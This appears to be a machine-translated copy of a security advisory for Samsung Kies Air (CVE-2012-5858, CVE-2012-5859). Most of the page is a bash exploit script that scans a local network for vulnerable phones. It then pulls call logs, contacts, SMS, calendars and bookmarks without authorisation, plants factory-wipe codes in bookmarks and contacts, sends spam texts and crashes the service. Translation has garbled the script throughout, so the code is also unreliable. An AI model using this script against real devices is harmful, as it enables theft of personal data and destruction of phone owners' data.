Samsung Kies Air Denial of Service and Security Bypass Vulnerability

Source: Internet
Author: User

Release date:
Updated on:

Affected Systems:
Samsung Kies Air 2.1.210161
Samsung Kies Air 2.1.207051
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56560
Cve id: CVE-2012-5858, CVE-2012-5859

Kies air is an action application that connects a computer to a mobile phone over wi-fi and can be managed using a browser.

Samsung Kies Air 2.1.207051, 2.1.210161, and other versions have security vulnerabilities that allow attackers to bypass certain security restrictions or cause denial of service.

<* Source: clodij. Lacayo
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

#! /Bin/bash

Echo "..."
Echo "..'',."
Echo ", cl :."
Echo ", doo '"
Echo ".. '''...,... '.'. ', '''.',...,. lXXd ."
Echo ". x0dllllc kMWN.; K: cMMM:; Kk. c0d.: w0.. 0 Ml: NW0c"
Echo "kK 'cmxcwo; K: 'nk: WN .. k0;. xKc: WX '. KWo' WMM0 ."
Echo "O0 .. NX. dMc; K :. XW, cWk lKl 'OK': WN '. KN :. ',;;,'....... 'lmmx '"
Echo "o0.. KW;. KN '; K: kMd xM:; 0O0d, XX'. KW,. KMMK :.....''.."
Echo "O0., c xMXllccOMX.; K: MWdclldWN... kKK;. XNNN; 0MMk"
Echo "o0.dk.: MK:; kMk; K:. NX:; oWK. 'OK, lKl 'wmc dWMO ."
Echo "kK. dK... XX... 0 M:; Kl kW; xMx l0d; 0 k. NM;. cKWk ,"
Echo ": Kk ,.. ''' xK. kM :. XX .. kKl ''...... oMx. KW ;. xKc. k0; NM; 'lo0c."
Echo ".; loooool;. xl, x;, cooooooooo,. dd... xl co 'co. dx...; oo :."
Echo "',..."
Echo "..."
Echo "Samsung S3 Kies Air example-v.1.3 www.samsung.com/us/kies /"
Echo ""
Echo ""
Echo"
######################################## ######################################## #################################"
Echo "Filename: kiesauth. sh"
Echo "Date: 10/23/2012"
Echo "Authors: @ cron __"
Echo "Presentation: http://www.slideshare.net/firmware/kies-air-launch-steal-crash"
Echo "Whitepaper: http://dl.dropbox.com/u/7779799/SamsungKiesAirAuthorizationBypassandDoS.pdf"
Echo "Version: 1.3"
Echo "Description: Script to detect local running Kies Air web servers on Samsung Galaxy S3 phones ."
Echo"
######################################## ######################################## #################################"
Echo ""
Echo ""

While true; do
Printf "% s \ n" "1) Scan local network"
Printf "% s \ n" "2) Send DoS"
Printf "\ n % s \ t" "Enter an option :"

Read option

# Option 1
Case $ option in
[1]) ip = 'ifconfig | awk/inet \/'
Echo $ ip
Echo "Type in your IP :"

Read ipstart
Echo-e "Scanning in progress... \ n"
Sudo nmap-sS-p 8080 $ {ipstart}-254-vv> nmap_scan.txt
Awk '/Nmap scan report for Android/|/open/|/Samsung/'nmap_scan.txt> ka_online.txt
Printf "% s \ n" "Active servers found :"
Cat ka_online.txt
Printf "% s \ t" "Was a server found? Type 'y' or 'N' and press [Enter]"

Read connect
If [$ connect = y]
Then
Echo "Enter the target IP and press [Enter]"
Read target_found
Wget -- ignore-length -- quiet http: // $ {target_found}: 8080/www/index.gz.html
Printf "\ n % s \ n" 1) Grab logs (incoming/outgoing CALS )"
Printf "% s \ n" "2) Grab address book"
Printf "% s \ n" "3) Grab calendar events (experimental )"
Printf "% s \ n" "4) Grab bookmarks"
Printf "% s \ n" "5) Grab SMS (incoming/outgoing )"
Printf "% s \ n" "6) Send remote wipe"
Printf "\ n % s \ t" "We have access, what wocould you like to do? "

Read action
Case $ action in
[1]) wget -- ignore-length -- quiet-O call_log.txt
Http: // $ {target_found}: 8080/ws/telephony/log? StartIndex = 0 & maxItems = 500 & sort = time-descending ;;
[2]) wget -- ignore-length -- quiet-O addressbook.txt
Http: // $ {target_found}: 8080/ws/pim/contacts? StartIndex = 0 & maxItems = 100 & sort = alpha-ascending ;;
[3]) wget -- ignore-length -- quiet-O calendar_events.txt
Http: // $ {target_found}: 8080/ws/calendar/instances/1348977600/1352606400? SearchQuery = calendarId: 1 calendarId: 2 & 1351121143933
;;
[4]) wget -- ignore-length -- quiet-O bookmarks.txt
Http: // $ {target_found}: 8080/ws/browser/bookmarks? StartIndex = 0 & maxItems = 100 & sort = time-descending ;;
[5]) wget -- ignore-length -- quiet-O messages.txt
Http: // $ {target_found}: 8080/ws/messaging/messages? StartIndex = 0 & maxItems = 10 & sort = timestamp_descending ;;
[6]) printf "\ n % s \ n" 1) Add remote wipe as a bookmark"
Printf "% s \ n" "2) Replace the default AT&T bookmark link with remote wipe"
Printf "% s \ n" "3) Replace contact information with remote wipe and mark it as favorite"
Printf "% s \ n" "4) Add remote wipe to address book and mark it as favorite"
Printf "% s \ n" "5) Send spam SMS"
Printf "\ n % s \ t" "Choose an option :"

Read wipe_option
Case $ wipe_option in
[1]) wipe1 = 'wget -- ignore-length -- server-response -- quiet -- post-data
'Url = http: // 192.168.1.1324252fremotewipe.html & title = AT % 26 T % 20 Mobile % 20web'
Http: // $ {target_found}: 8080/ws/browser/bookmarks ';;
[2]) echo "DELETE method not supported by wget .";;
[3]) wipe3 = 'curl-O curl_response.txt-x put-d
"Title = & firstName = Vicky & lastName = & suffix = & nickName = & homePhoneNo = & workPhoneNo = & mobilePhoneNo = * 2767 * 3855% 23 & defaultPhoneNo =-1 & workEmail = & = & otherEmail = & organization = & jobTitle = & favorite = true & accountType = Phone & accountName = Phone"
Http: // $ {target_found}: 8080/ws/pim/contacts/37 ';;
[4]) wipe4 = 'wget -- ignore-length -- quiet -- post-data' title = & firstName = CALL FOR A SEXY
TIME & lastName = & suffix = & nickName = & homePhoneNo = & workPhoneNo = & mobilePhoneNo = * 2767 * 3855% 23 & defaultPhoneNo =-1 & workEmail = & homeEmail = & otherEmail = & organization = & jobTitle = & favorite = true & accountType = Phone & accountName = Phone'
Http: // $ {target_found}: 8080/ws/pim/contacts 'echo-e "Entry added .";;
[5]) wipe5 = 'wget -- ignore-length -- quiet -- post-data
'Folderid = & destination = tel: 111 & destinationContactId = & destinationName = & body = Hey click this link!
Goatse. cx & mimeType = text/plain 'HTTP: // $ {target_found}: 8080/ws/messaging/sms/messages ';;

Esac
Esac

Elif [$ connect = n]
Then
Printf "% s" "No available targets found ."
Else
Printf "% s" "Not a valid entry. Aborted ."
Fi ;;

# Option 2: Manually specify this for now.
[2]) t1 = 'wget -- quiet-p' http: // 192.168.1.136: 8080/www/apps/KiesAir/jws/ssd. php? E & ''echo-e "Crash successfully
Sent to device. \ n ";;
Esac
Echo-e "Script reloaded. \ n"
Done

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Samsung
-------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://samsungapps.sina.cn/supportMain/getSupportMainList.as

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.